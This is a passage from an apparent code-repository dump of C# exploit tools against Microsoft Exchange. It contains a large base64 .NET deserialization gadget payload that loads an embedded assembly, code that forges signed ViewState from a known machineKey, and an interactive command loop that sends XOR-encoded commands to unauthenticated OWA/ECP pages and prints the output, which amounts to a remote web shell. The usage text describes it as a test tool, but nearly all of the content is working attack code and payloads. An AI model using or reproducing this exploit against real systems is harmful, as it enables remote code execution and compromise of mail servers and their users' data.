AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAADAAAAIA3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQPAAAAH1N5c3RlbS5Vbml0eVNlcmlhbGl6YXRpb25Ib2xkZXIDAAAABERhdGEJVW5pdHlUeXBlDEFzc2VtYmx5TmFtZQEAAQgGIQAAAP4BU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uQnl0ZVtdLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAABiIAAABOU3lzdGVtLkNvcmUsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5EBAAAAAHAAAACQMAAAAKCSQAAAAKCAgAAAAACggIAQAAAAERAAAADwAAAAYlAAAA9QJTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAkiAAAAEBIAAAAHAAAACQQAAAAKCSgAAAAKCAgAAAAACggIAQAAAAETAAAADwAAAAYpAAAA3wNTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhYmxlYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABAUAAAABwAAAAkFAAAACgksAAAACggIAAAAAAoICAEAAAABFQAAAA8AAAAGLQAAAOYCU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABAWAAAABwAAAAkGAAAACTAAAAAJMQAAAAoICAAAAAAKCAgBAAAAARcAAAAPAAAABjIAAADvAVN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAkiAAAAEBgAAAAHAAAACQcAAAAKCTUAAAAKCAgAAAAACggIAQAAAAEZAAAADwAAAAY2AAAAKVN5c3RlbS5XZWIuVUkuV2ViQ29udHJvbHMuUGFnZWREYXRhU291cmNlBAAAAAY3AAAATVN5c3RlbS5XZWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iMDNmNWY3ZjExZDUwYTNhEBoAAAAHAAAACQgAAAAICAAAAAAICAoAAAAIAQAIAQAIAQAICAAAAAABGwAAAA8AAAAGOQAAAClTeXN0ZW0uQ29tcG9uZW50TW9kZWwuRGVzaWduLkRlc2lnbmVyVmVyYgQAAAAGOgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5EBwAAAAFAAAADQIJOwAAAAgIAwAAAAkLAAAAAR0AAAAPAAAABj0AAAA0U3lzdGVtLlJ1bnRpbWUuUmVtb3RpbmcuQ2hhbm5lbHMuQWdncmVnYXRlRGljdGlvbmFyeQQAAAAGPgAAAEttc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkQHgAAAAEAAAAJCQAAABAfAAAAAgAAAAkKAAAACQoAAAAQIAAAAAIAAAAGQQAAAAAJQQAAAAQkAAAAIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXICAAAACERlbGVnYXRlB21ldGhvZDADAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJQgAAAAlDAAAAASgAAAAkAAAACUQAAAAJRQAAAAEsAAAAJAAAAAlGAAAACUcAAAABMAAAACQAAAAJSAAAAAlJAAAAATEAAAAkAAAACUoAAAAJSwAAAAE1AAAAJAAAAAlMAAAACU0AAAABOwAAAAQAAAAJTgAAAAlPAAAABEIAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGUAAAANUBU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkJ5dGVbXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGUgAAABpTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseQZTAAAABExvYWQKBEMAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCVMAAAAJPgAAAAlSAAAABlYAAAAnU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkgTG9hZChCeXRlW10pBlcAAAAuU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkgTG9hZChTeXN0ZW0uQnl0ZVtdKQgAAAAKAUQAAABCAAAABlgAAADMAlN5c3RlbS5GdW5jYDJbW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAJUgAAAAZbAAAACEdldFR5cGVzCgFFAAAAQwAAAAlbAAAACT4AAAAJUgAAAAZeAAAAGFN5c3RlbS5UeXBlW10gR2V0VHlwZXMoKQZfAAAAGFN5c3RlbS5UeXBlW10gR2V0VHlwZXMoKQgAAAAKAUYAAABCAAAABmAAAAC2A1N5c3RlbS5GdW5jYDJbW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhYmxlYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABmIAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhYmxlYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQZjAAAADUdldEVudW1lcmF0b3IKAUcAAABDAAAACWMAAAAJPgAAAAliAAAABmYAAABFU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtTeXN0ZW0uVHlwZV0gR2V0RW51bWVyYXRvcigpBmcAAACUAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSBHZXRFbnVtZXJhdG9yKCkIAAAACgFIAAAAQgAAAAZoAAAAwAJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Cb29sZWFuLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABmoAAAAeU3lzdGVtLkNvbGxlY3Rpb25zLklFbnVtZXJhdG9yBmsAAAAITW92ZU5leHQKAUkAAABDAAAACWsAAAAJPgAAAAlqAAAABm4AAAASQm9vbGVhbiBNb3ZlTmV4dCgpBm8AAAAZU3lzdGVtLkJvb2xlYW4gTW92ZU5leHQoKQgAAAAKAUoAAABCAAAABnAAAAC9AlN5c3RlbS5GdW5jYDJbW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGcgAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBnMAAAALZ2V0X0N1cnJlbnQKAUsAAABDAAAACXMAAAAJPgAAAAlyAAAABnYAAAAZU3lzdGVtLlR5cGUgZ2V0X0N1cnJlbnQoKQZ3AAAAGVN5c3RlbS5UeXBlIGdldF9DdXJyZW50KCkIAAAACgFMAAAAQgAAAAZ4AAAAxgFTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZ6AAAAEFN5c3RlbS5BY3RpdmF0b3IGewAAAA5DcmVhdGVJbnN0YW5jZQoBTQAAAEMAAAAJewAAAAk+AAAACXoAAAAGfgAAAClTeXN0ZW0uT2JqZWN0IENyZWF0ZUluc3RhbmNlKFN5c3RlbS5UeXBlKQZ/AAAAKVN5c3RlbS5PYmplY3QgQ3JlYXRlSW5zdGFuY2UoU3lzdGVtLlR5cGUpCAAAAAoBTgAAAA8AAAAGgAAAACZTeXN0ZW0uQ29tcG9uZW50TW9kZWwuRGVzaWduLkNvbW1hbmRJRAQAAAAJOgAAABBPAAAAAgAAAAmCAAAACAgAIAAABIIAAAALU3lzdGVtLkd1aWQLAAAAAl9hAl9iAl9jAl9kAl9lAl9mAl9nAl9oAl9pAl9qAl9rAAAAAAAAAAAAAAAIBwcCAgICAgICAhMT0nTuKtERi/sAoMkPJvcLCw=="; 136 | 137 | byte[] payload2 = System.Convert.FromBase64String(xaml_payload2); 138 | string data2 = CreateViewState(payload2, generator, key); 139 | 140 | while (true) 141 | { 142 | Console.Write("Command >"); 143 | string command = Console.ReadLine(); 144 | 145 | if (command == "exit") 146 | break; 147 | command = xor(command); 148 | HttpWebRequest hwr = WebRequest.Create(targeturl) as HttpWebRequest; 149 | hwr.AllowAutoRedirect = false; 150 | hwr.Method = "POST"; 151 | hwr.UserAgent = "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36xxxxx"; 152 | hwr.ContentType = "application/x-www-form-urlencoded"; 153 | hwr.Proxy = null; 154 | byte[] post = Encoding.UTF8.GetBytes("__VIEWSTATE="+HttpUtility.UrlEncode(data2)+"&__VIEWSTATEGENERATOR="+generator+"&__Value="+HttpUtility.UrlEncode(command)); 155 | hwr.ContentLength = post.Length; 156 | hwr.GetRequestStream().Write(post,0,post.Length); 157 | HttpWebResponse res = hwr.GetResponse() as HttpWebResponse; 158 | Console.WriteLine(res.StatusCode); 159 | 160 | Stream instream = res.GetResponseStream(); 161 | StreamReader sr = new StreamReader(instream, Encoding.UTF8); 162 | string content = sr.ReadToEnd(); 163 | Console.WriteLine(xor(content)); 164 | } 165 | } 166 | 167 | catch (Exception e) 168 | { 169 | Console.WriteLine("{0}", e.Message); 170 | System.Environment.Exit(0); 171 | } 172 | } 173 | 174 | } 175 | } 176 | -------------------------------------------------------------------------------- /SharpExchangeDeserializeShell-NoAuth-ghostfile.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Text; 3 | using System.IO; 4 | using System.Security.Cryptography; 5 | using System.Net; 6 | using System.Web; 7 | using System.Globalization; 8 | using System.Security.Cryptography.X509Certificates; 9 | 10 | namespace SharpExchangeDeserializeShelltest 11 | { 12 | 13 | public class Program 14 | { 15 | static byte[] strToHexByte(string hexString) 16 | { 17 | if ((hexString.Length % 2) != 0) 18 | hexString += " "; 19 | byte[] returnBytes = new byte[hexString.Length / 2]; 20 | for (int i = 0; i < returnBytes.Length; i++) 21 | returnBytes[i] = Convert.ToByte(hexString.Substring(i * 2, 2), 16); 22 | return returnBytes; 23 | } 24 | 25 | static string CreateViewState(byte[] dat,string generator,string key) 26 | { 27 | MemoryStream ms = new MemoryStream(); 28 | byte[] validationKey= strToHexByte(key); 29 | 30 | uint _clientstateid = 0; 31 | if(!uint.TryParse(generator, NumberStyles.HexNumber, CultureInfo.InvariantCulture, out _clientstateid)) 32 | { 33 | System.Environment.Exit(0); 34 | } 35 | 36 | byte[] _mackey = new byte[4]; 37 | _mackey[0] = (byte)_clientstateid; 38 | _mackey[1] = (byte)(_clientstateid >> 8); 39 | _mackey[2] = (byte)(_clientstateid >> 16); 40 | _mackey[3] = (byte)(_clientstateid >> 24); 41 | 42 | ms = new MemoryStream(); 43 | ms.Write(dat,0,dat.Length); 44 | ms.Write(_mackey,0,_mackey.Length); 45 | byte[] hash=(new HMACSHA1(validationKey)).ComputeHash(ms.ToArray()); 46 | ms=new MemoryStream(); 47 | ms.Write(dat,0,dat.Length); 48 | ms.Write(hash,0,hash.Length); 49 | return Convert.ToBase64String(ms.ToArray()); 50 | } 51 | 52 | public static void ShowUsage() 53 | { 54 | string Usage = @" 55 | Use to test the deserializing code execution of Exchange. 56 | 57 | You should modify the machineKey in %ExchangeInstallPath%\FrontEnd\HttpProxy\\web.config to implement deserializing code execution. 58 | :owa or ecp 59 | 60 | Usage: 61 | 62 | : owa or ecp 63 | 64 | eg. 65 | 192.168.1.1 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF owa 66 | mail.test.com CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF ecp 67 | 68 | "; 69 | Console.WriteLine(Usage); 70 | } 71 | 72 | public static void Main(string[] args) 73 | { 74 | 75 | if(args.Length!=3) 76 | { 77 | ShowUsage(); 78 | System.Environment.Exit(0); 79 | } 80 | try 81 | { 82 | ServicePointManager.ServerCertificateValidationCallback = (sender, certificate, chain, sslPolicyErrors) => { return true; }; 83 | 84 | string targeturl = ""; 85 | string generator = ""; 86 | if(args[2] =="owa") 87 | { 88 | targeturl = "https://" + args[0] + "/owa/auth/errorFE.aspx"; 89 | generator = "042A94E8"; 90 | 91 | } 92 | else if(args[2] =="ecp") 93 | { 94 | targeturl = "https://" + args[0] + "/ecp/auth/TimeoutLogout.aspx"; 95 | generator = "277B1C2A"; 96 | } 97 | else 98 | { 99 | Console.WriteLine("[!] Wrong input"); 100 | System.Environment.Exit(0); 101 | } 102 | string key = args[1]; 103 | Console.WriteLine("[*] TargetURL: " + targeturl); 104 | Console.WriteLine(); 105 | 106 | 107 | string xaml_payload2 = "/wEyiHkAAQAAAP////8BAAAAAAAAAAwCAAAAV1N5c3RlbS5XaW5kb3dzLkZvcm1zLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQUBAAAAIVN5c3RlbS5XaW5kb3dzLkZvcm1zLkF4SG9zdCtTdGF0ZQEAAAARUHJvcGVydHlCYWdCaW5hcnkHAgIAAAAJAwAAAA8DAAAAxzsAAAIAAQAAAP////8BAAAAAAAAAAQBAAAAf1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkxpc3RgMVtbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0DAAAABl9pdGVtcwVfc2l6ZQhfdmVyc2lvbgUAAAgICQIAAAAKAAAACgAAABACAAAAEAAAAAkDAAAACQQAAAAJBQAAAAkGAAAACQcAAAAJCAAAAAkJAAAACQoAAAAJCwAAAAkMAAAADQYHAwAAAAEBAAAAAQAAAAcCCQ0AAAAMDgAAAGFTeXN0ZW0uV29ya2Zsb3cuQ29tcG9uZW50TW9kZWwsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQQAAABqU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLlNlcmlhbGl6YXRpb24uQWN0aXZpdHlTdXJyb2dhdGVTZWxlY3RvcitPYmplY3RTdXJyb2dhdGUrT2JqZWN0U2VyaWFsaXplZFJlZgIAAAAEdHlwZQttZW1iZXJEYXRhcwMFH1N5c3RlbS5Vbml0eVNlcmlhbGl6YXRpb25Ib2xkZXIOAAAACQ8AAAAJEAAAAAEFAAAABAAAAAkRAAAACRIAAAABBgAAAAQAAAAJEwAAAAkUAAAAAQcAAAAEAAAACRUAAAAJFgAAAAEIAAAABAAAAAkXAAAACRgAAAABCQAAAAQAAAAJGQAAAAkaAAAAAQoAAAAEAAAACRsAAAAJHAAAAAELAAAABAAAAAkdAAAACR4AAAAEDAAAABxTeXN0ZW0uQ29sbGVjdGlvbnMuSGFzaHRhYmxlBwAAAApMb2FkRmFjdG9yB1ZlcnNpb24IQ29tcGFyZXIQSGFzaENvZGVQcm92aWRlcghIYXNoU2l6ZQRLZXlzBlZhbHVlcwAAAwMABQULCBxTeXN0ZW0uQ29sbGVjdGlvbnMuSUNvbXBhcmVyJFN5c3RlbS5Db2xsZWN0aW9ucy5JSGFzaENvZGVQcm92aWRlcgjsUTg/AgAAAAoKAwAAAAkfAAAACSAAAAAPDQAAAAAeAAACTVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABdXbmAAAAAAAAAAAOAAAiELAQsAABYAAAAGAAAAAAAA3jUAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAIg1AABTAAAAAEAAAKgCAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAA5BUAAAAgAAAAFgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAKgCAAAAQAAAAAQAAAAYAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAHAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAADANQAAAAAAAEgAAAACAAUAHCUAAGwQAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABswBAAeAgAAAQAAEQIoAwAACnIBAABwCnIcAgBwCygEAAAKBigFAAAKbwYAAAoMKAcAAApvCAAACm8JAAAKF40TAAABExAREBYfL50REG8KAAAKbwsAAAoNCSgHAAAKbwgAAApvDAAACm8LAAAKbw0AAAoTBBEEFjIdCREEKAcAAApvCAAACm8MAAAKbw4AAApvDwAACg1yKAIAcBMFCXIqAgBwbxAAAAoWMRQJFglyKgIAcG8QAAAKbxEAAAoTBREFcioCAHAoEgAAChMGEQZyLgIAcHIqAgBwbxMAAAoTBhEGCHMGAAAGEwcRB28UAAAKJhQTCBQTCRQTChQTCxQTDCgVAAAKLHrQFgAAASgWAAAKEw0RDXI0AgBwHyhvFwAAChMOEQ1yVgIAcB8kbxcAAAoTCBENcooCAHAfJG8XAAAKEwkRDhRvGAAAChMKEQgRCm8YAAAKEwsRCREKbxgAAAoTDBEIEQoXjBsAAAFvGQAAChEJEQoWjBsAAAFvGQAAChEHKBoAAAoRCBQoGwAACiwWEQgRChELbxkAAAoRCREKEQxvGQAACigHAAAKbxwAAApvHQAACigHAAAKbxwAAAoXbx4AAAooBwAACm8fAAAKEQZzIAAACiDoAwAAbyEAAAqMIAAAAQcoIgAACm8jAAAKKAcAAApvHAAACm8kAAAK3iQTDygHAAAKbxwAAApyrgIAcBEPbyUAAAooJ